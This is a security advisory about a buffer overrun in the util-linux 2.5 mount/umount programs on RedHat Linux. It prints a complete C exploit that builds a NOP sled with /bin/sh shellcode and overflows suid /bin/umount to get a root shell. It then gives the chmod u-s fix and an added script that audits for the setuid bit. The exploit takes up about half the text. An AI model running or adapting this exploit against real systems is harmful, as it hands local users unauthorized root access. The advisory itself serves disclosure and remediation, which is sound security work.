COMMAND

    mount-umount

SYSTEMS AFFECTED

    RedHat Linux

PROBLEM

    A vulnerability exists in the mount/umount programs of the util-linux
    2.5 package. If installed suid-to-root, these programs allow local
    users to gain super-user (root) privileges. Exploits that exercise
    this vulnerability have been made public.

    The mount/umount utilities from util-linux 2.5 suffer from a buffer
    overrun. Installing mount/umount suid-to-root is necessary only to let
    local users mount and unmount removable media without super-user
    privileges. If this feature is not required, it is recommended that
    the suid bit be removed from both the mount and umount programs. If
    the feature is required, consider other ways of implementing it, such
    as an auto-mounter or the sudo mechanism. The exploit that follows was
    discovered and coded by Bloodmask & Vio.

-------------------------------------- linux_umount_exploit.c ----------
#include <stdio.h>
#include <stdlib.h>
#include <string.h>      /* memset, strlen */
#include <unistd.h>
#include <fcntl.h>
#include <sys/types.h>   /* u_long, u_char, u_int */
#include <sys/stat.h>

#define PATH_MOUNT "/bin/umount"
#define BUFFER_SIZE 1024
#define DEFAULT_OFFSET 50

/* returns the current stack pointer (i386 only: the value is left in %eax,
   which is where the caller expects the return value) */
u_long get_esp()
{
  __asm__("movl %esp, %eax");
}

int main(int argc, char **argv)
{
  u_char execshell[] =
   "\xeb\x24\x5e\x8d\x1e\x89\x5e\x0b\x33\xd2\x89\x56\x07\x89\x56\x0f"
   "\xb8\x1b\x56\x34\x12\x35\x10\x56\x34\x12\x8d\x4e\x0b\x8b\xd1\xcd"
   "\x80\x33\xc0\x40\xcd\x80\xe8\xd7\xff\xff\xff/bin/sh";

   char *buff = NULL;
   unsigned long *addr_ptr = NULL;
   char *ptr = NULL;

   int i;
   int ofs = DEFAULT_OFFSET;

   buff = malloc(4096);
   if(!buff)
   {
      printf("can't allocate memory\n");
      exit(0);
   }
   ptr = buff;

   /* fill start of buffer with nops */

   memset(ptr, 0x90, BUFFER_SIZE-strlen(execshell));
   ptr += BUFFER_SIZE-strlen(execshell);

   /* stick asm code into the buffer */

   for(i=0;i<strlen(execshell);i++)
      *(ptr++) = execshell[i];

   /* append two copies of the guessed address, then terminate the string */
   addr_ptr = (unsigned long *)ptr;
   for(i=0;i<(8/4);i++)
      *(addr_ptr++) = get_esp() + ofs;
   ptr = (char *)addr_ptr;
   *ptr = 0;

   (void)alarm((u_int)0);
   /* the overlong argument is passed to the suid umount program */
   execl(PATH_MOUNT, "umount", buff, NULL);
   return 0;
}

SOLUTION

    Get the upgrade, or, to prevent the vulnerability from being exploited
    in the meantime, remove the suid bit from the mount and umount programs
    using the command:

        chmod u-s /bin/mount /bin/umount
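The following POSIX sh script is an added example, not part of the original
advisory: it audits whether mount and umount are still installed setuid
and applies the advisory's chmod u-s remedy. The default paths /bin/mount
and /bin/umount are taken from the advisory; any other path given on the
command line is an assumption of the caller.

```shell
#!/bin/sh
# Audit helper for the util-linux mount/umount setuid issue.
# Added example; the only advisory-supplied facts are the two default
# paths and the "chmod u-s" remedy.

# suid_status FILE : prints "setuid FILE" or "clean FILE".
# Returns 0 when the setuid bit is NOT set, 1 when it is.
suid_status() {
  if [ -u "$1" ]; then          # POSIX test: set-user-ID bit present
    printf 'setuid %s\n' "$1"
    return 1
  fi
  printf 'clean %s\n' "$1"
  return 0
}

# audit_suid [FILE...] : reports every file given (defaults to the
# advisory's /bin/mount and /bin/umount); returns 1 if any is setuid.
audit_suid() {
  [ $# -eq 0 ] && set -- /bin/mount /bin/umount
  found=0
  for f in "$@"; do
    if [ ! -e "$f" ]; then
      printf 'missing %s\n' "$f"
      continue
    fi
    suid_status "$f" || found=1
  done
  return $found
}

# drop_suid FILE... : the advisory's remedy, clears the setuid bit.
drop_suid() {
  chmod u-s "$@"
}

# When run as a script: audit the default paths and print a hint if either
# is still setuid (exit status stays 0 so the script can be sourced).
audit_suid || echo 'setuid mount/umount present: run drop_suid /bin/mount /bin/umount'
```

Run it as root after upgrading util-linux to confirm nothing was left
setuid; on a system that needs user mounts, use the sudo or auto-mounter
route the advisory mentions instead of restoring the bit.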